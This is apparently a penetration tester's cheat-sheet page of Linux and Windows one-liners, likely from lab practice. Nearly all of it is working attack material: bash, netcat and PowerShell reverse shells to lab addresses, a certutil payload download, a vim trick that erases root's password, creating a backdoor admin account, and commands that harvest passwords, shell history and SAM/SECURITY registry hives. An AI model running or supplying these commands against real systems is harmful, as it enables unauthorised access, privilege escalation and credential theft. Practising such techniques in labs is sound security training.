Useful Commands

Linux

Linux one-liner reverse shell:

/bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1'

bash -c 'bash -i >& /dev/tcp/10.10.16.78/4444 0>&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f

Finding string in all files:

sudo find / -type f -readable -exec grep -Hro "password" {} \;

Remove su command restriction exploiting vims cap_dac_override:

echo -e ':%s/^root:[^:]*:/root::/\nwq!' | /usr/bin/vim.basic -es /etc/passwd

Finding SUID binaries on linux:

find / -perm -4000 2>/dev/null

Windows

Adding Admin user on Windows:

net user user Pwn3d! /add;net localgroup administrators user /add

Identify unquoted service binary paths on Windows

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

List all readable PS command history files:

foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Commands to check user account description field where we might find credentials

Get-WmiObject -Class Win32_OperatingSystem | select Description

Get-LocalUser

Reverse shell on-liner for PS

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "& { $client = New-Object System.Net.Sockets.TCPClient('10.10.15.244',4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2  = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()}"

Certutil file transfer

certutil.exe -urlcache -split -f http://10.10.15.244:8000/priv.bat priv.bat

Get all CLSIDs:

"HKLM:\Software\Classes\CLSID", "HKCU:\Software\Classes\CLSID" | ForEach-Object { if (Test-Path $_) { Get-ChildItem -Path $_ -Recurse | ForEach-Object { $_.Name -replace '.+\\\{(.+)\}', '{${1}}' } } }

Finding specific file using filename

Get-ChildItem -Recurse -Filter "confidential.txt"

Search for string in files from current folder and subfolders

Get-ChildItem -Recurse -File | Select-String -Pattern "ldapadmin"

Manual hive dumps:

reg save HKLM\SYSTEM SYSTEM.SAVE
reg save HKLM\SECURITY SECURITY.SAVE
reg save HKLM\SAM SAM.SAVE

PreviousExploits NextPS Scripts

Last updated 10 months ago